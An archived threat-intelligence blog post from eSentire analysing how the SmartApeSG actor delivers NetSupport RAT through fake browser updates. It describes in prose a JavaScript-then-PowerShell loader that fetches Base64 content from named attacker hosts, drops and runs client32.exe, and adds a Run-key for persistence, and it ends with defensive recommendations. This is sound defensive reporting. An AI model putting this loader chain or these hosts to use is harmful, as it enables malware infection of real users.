SmartApeSG Delivering NetSupport RAT
By eSentire Threat Response Unit (TRU)
Archived: 2026-04-05 20:06:01 UTC
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters
and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the
Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced
Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We
outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
What did we find?
Early in January 2024, our machine-learning-powered PowerShell classifier, BlueSteel, detected malicious
PowerShell script execution. Upon further investigation the eSentire Threat Response Unit (TRU) associated the
threat to SmartApeSG, a threat actor that relies on fake browser updates to distribute NetSupport RAT.
The execution was traced to the end-user visiting a compromised webpage which served a fake browser update
ZIP containing Update_browser_17.6436.js. We could not retrieve the files or the compromised website, but we
found similar samples here and here.
The initial JavaScript file included legitimate code sections to conceal the malicious code (Figure 1).
Figure 1. Contents of the JS file
The code retrieves malicious script from jennifergalvin[.]com/cache/news.php?37668, as shown in Figure 2.
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 1 of 7

Figure 2: Deobfuscated JS content
The retrieved JavaScript file contains the PowerShell command shown in Figure 3.
Figure 3: Retrieved JS file containing the PowerShell command
The script does the following:
$bvQQOQYGOGdiqHsdLSvR is set to a URL (jesusanaya.com/GetData[.]php?10864).
$vxjoBVCFtQyMhM downloads the content from the above URL.
$AcusblBKewkwXkdlGOMKgqQcFhnA converts the downloaded content from Base64 encoding.
A random number is generated, and a new directory path is created under the Application Data folder,
appended with the random number.
The Base64 decoded data from the retrieved content is saved as a rtrs.zip file. The zip file is then extracted
to the created directory.
The script checks for an executable client32.exe in the extracted directory. If found, it executes
client32.exe.
A new registry item is created under the HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run path
to ensure client32.exe runs on startup (T1547.001).
The Base64-encoded content mentioned above decodes to a ZIP archive (Figure 4). The archive contains
NetSupport components, including the client (Figure 5).
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 2 of 7

Figure 4: Base64-encoded content that eventually decodes to a ZIP archive
Figure 5: NetSupport configuration file
Detection Rules
You can access the Yara rules for SmartApeSG here.
What did we do?
We investigated the threat and confirmed the activity is malicious.
Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host,
contained the threat, and notified the customer of suspicious activities.
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 3 of 7

What can you learn from this TRU Positive?
SmartApeSG's use of fake browser updates to distribute the NetSupport RAT showcases a common social
engineering technique, in which attackers often disguise malware as legitimate updates or software to trick
users into downloading harmful files.
The compromised webpage serving a JavaScript file within a ZIP archive underlines the need for web
security and caution when downloading files from websites, especially those that prompt unexpected
updates or downloads.
The inclusion of legitimate code sections in the initial JavaScript file to hide malicious content is a classic
obfuscation technique.
The PowerShell script's operations, including downloading content, creating directories, extracting ZIP
files, executing executables, and modifying registry items, provide insights into typical NetSupport
deployment strategies. This knowledge is crucial for developing robust detection and response
mechanisms.
The decoding of Base64 content to reveal a ZIP archive containing NetSupport components highlights the
multi-layered nature of malware deployment.
Recommendations from our Threat Response Unit (TRU) Team:
Train users to identify and report potentially malicious content using Phishing and Security Awareness
Training (PSAT) programs.
Identify file types that are commonly associated with security risks, such as executable files (.exe, .bat,
.cmd), script files (.js, .vbs, .ps1), and certain document types that support macros (.docm, .xlsm). Then
select a file type that is inherently safer and does not support executable code or active content (i.e., a plain
text format like .txt).
Ensure employees have access to a dedicated software center to download corporate-approved software.
Protect endpoints against malware by:
Ensuring antivirus signatures are up-to-date.
Using a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) tool to detect and
contain threats.
Indicators of Compromise
You can access Indicators of Compromise here.
References
https://medium.com/walmartglobaltech/smartapesg-4605157a5b80
https://bazaar.abuse.ch/sample/45b46c432bb3857ff98a2f67f3480b85f8fb37f5df55941e875e2d70f87ca24e/
https://app.any.run/tasks/fd5f0212-761f-43e0-9b60-3762f2eb2074/
https://attack.mitre.org/techniques/T1547/001/
To learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next
Level MDR, connect with an eSentire Security Specialist now.
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 4 of 7

GET STARTED
ABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your
organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7
Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and
works as an extension of your security team to continuously improve our Managed Detection and Response
service. By providing complete visibility across your attack surface and performing global threat sweeps and
proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending
your organization against known and unknown threats.
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 5 of 7

Back to blog
Take Your Cybersecurity Program to the Next Level with eSentire MDR.
BUILD A QUOTE
in this blog
What did we find?Detection RulesWhat did we do?What can you learn from this TRU Positive?Recommendations
from our Threat Response Unit (TRU) Team:
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 6 of 7

Source: https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat
Page 7 of 7